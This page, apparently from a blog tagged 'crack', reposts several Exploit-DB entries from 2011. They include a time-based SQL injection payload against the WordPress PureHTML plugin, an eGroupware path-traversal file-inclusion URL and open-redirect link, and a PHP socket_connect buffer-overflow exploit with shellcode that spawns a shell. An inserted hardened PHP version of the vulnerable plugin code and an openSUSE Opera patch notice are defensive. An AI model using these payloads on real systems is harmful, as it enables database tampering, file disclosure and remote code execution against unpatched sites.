AppUnix

Tag: crack

WordPress PureHTML plugin <= 1.0.0 SQL Injection

11/12/2015 by OwnServer


# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip
# Version: 1.0.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/pure-html/alter.php
PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
    if ( !db_unx_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Source: http://www.exploit-db.com/exploits/17758/
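The delete branch from the advisory above in hardened form, as an added example that is not the plugin's or the advisory author's code: the nonce check fails closed and the request value reaches SQL only through a `prepare()` placeholder. It assumes it runs inside WordPress; the function name, the `purehtml_delete` nonce action and the `manage_options` capability are assumptions.

```php
<?php
// Added example, not the plugin's code. Runs inside WordPress, where
// wp_verify_nonce(), current_user_can(), wp_unslash(), wp_die() and $wpdb exist.
// Assumed names: purehtml_handle_delete(), the 'purehtml_delete' nonce action
// and the 'manage_options' capability.
function purehtml_handle_delete() {
    global $wpdb;

    // Fail closed. The original verified the nonce only when the field was
    // missing, so any supplied value (the PoC sends 1) skipped the check.
    $nonce = isset( $_POST['PureHTMLNOnce'] ) ? wp_unslash( $_POST['PureHTMLNOnce'] ) : '';
    if ( ! wp_verify_nonce( $nonce, 'purehtml_delete' ) ) {
        wp_die( 'Invalid or missing nonce.', '', array( 'response' => 403 ) );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Not allowed.', '', array( 'response' => 403 ) );
    }

    // Accept only a positive integer id; anything else is rejected, not cast.
    $raw = isset( $_POST['id'] ) ? wp_unslash( $_POST['id'] ) : '';
    $id  = filter_var( $raw, FILTER_VALIDATE_INT, array( 'options' => array( 'min_range' => 1 ) ) );
    if ( false === $id ) {
        wp_die( 'Invalid id.', '', array( 'response' => 400 ) );
    }

    // prepare() escapes only what is bound to a placeholder. The table name is
    // built from the trusted prefix; the request value goes through %d.
    $table = $wpdb->prefix . 'pureHTML_functions';
    $sql   = $wpdb->prepare( "DELETE FROM `{$table}` WHERE id = %d", $id );

    return $wpdb->query( $sql ); // rows deleted, or false on error
}
```

Calling `$wpdb->prepare()` on a string that was already concatenated, as in the vulnerable code, gives it nothing to escape, which is why the quoted `id` value still reached the database.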

Exploit for WordPress core 3.1.3 Persistent SELF XSS Vulnerability

27/06/2011 by OwnServer

Title: WordPress core 3.1.3 self-XSS

Author: Jelmer de Hen
Software link: http://wordpress.org/download/
Version: 3.1.3
WordPress 3.1.3 has a self-XSS vulnerability in the following pages:
/wp-admin/user-edit.php?user_id=<uid>
/wp-admin/profile.php
By putting Javascript inside the input elements "first_name", "last_name" or "nickname" the self-XSS will trigger 3 times.

More information: http://h.ackack.net/0day-xss-in-wordpress-core.html

 

Source: http://www.exploit-db.com/exploits/17454/

Opera Browser Vulnerability on openSUSE 11.x

24/06/2011 by OwnServer
From: opensuse-security@opensuse.org
To: opensuse-security-announce@opensuse.org
Subject: [security-announce] openSUSE-SU-2011:0688-1: important: opera
Date: Fri, 24 Jun 2011 15:08:26 +0200 (CEST)
Message-ID: <20110624130826.38F8A32350@maintenance.suse.de>

openSUSE Security Update: opera
______________________________________________________________________________

Announcement ID:    openSUSE-SU-2011:0688-1
Rating:             important
References:         #694567
Affected Products:
                    openSUSE 11.4
                    openSUSE 11.3
______________________________________________________________________________

An update that contains security fixes can now be installed.
It includes one version update.

Description: opera 11.11 fixes a security vulnerability.

Citing http://www.opera.com/support/kb/view/992/:

Framesets allow web pages to hold other pages inside them.

Certain frameset constructs are not handled correctly when the page is unloaded, causing a memory corruption.

To inject code, additional techniques will have to be employed.

Patch Instructions:

To install this openSUSE Security Update use YaST online_update.

Alternatively you can run the command listed for your product:

- openSUSE 11.4:

    zypper in -t patch opera-4588

- openSUSE 11.3:

    zypper in -t patch opera-4588

To bring your system up-to-date, use "zypper patch".

Package List:

- openSUSE 11.4 (i586 x86_64) [New Version: 11.11]:

    opera-11.11-1.2.1
    opera-gtk-11.11-1.2.1
    opera-kde4-11.11-1.2.1

- openSUSE 11.3 (i586 x86_64) [New Version: 11.11]:

    opera-11.11-1.2.1
    opera-gtk-11.11-1.2.1
    opera-kde4-11.11-1.2.1

References: https://bugzilla.novell.com/694567

Source: http://lwn.net/Articles/449150/

eGroupware 1.8.001.20110421 Multiple Vulnerabilities

25/05/2011 by OwnServer

------------------------------------------------------------------------

Software................eGroupware 1.8.001.20110421
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in eGroupware 1.8.001.20110421
can be exploited to include arbitrary files.
--PoC--
http://localhost/egroupware/admin/remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a
------------------------------------------------------------------------
Software................eGroupware 1.8.001.20110421
Vulnerability...........Open Redirect
Threat Level............Low (1/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
An open redirect in eGroupware 1.8.001.20110421 can be exploited to
redirect users to an arbitrary URL.
--PoC--

http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/

 

Source: http://www.exploit-db.com/exploits/17322/

PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

25/05/2011 by OwnServer

<?php

// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";
define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
"\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
"\xcd\x80";
echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);

?>

 

Source: http://www.exploit-db.com/exploits/17318
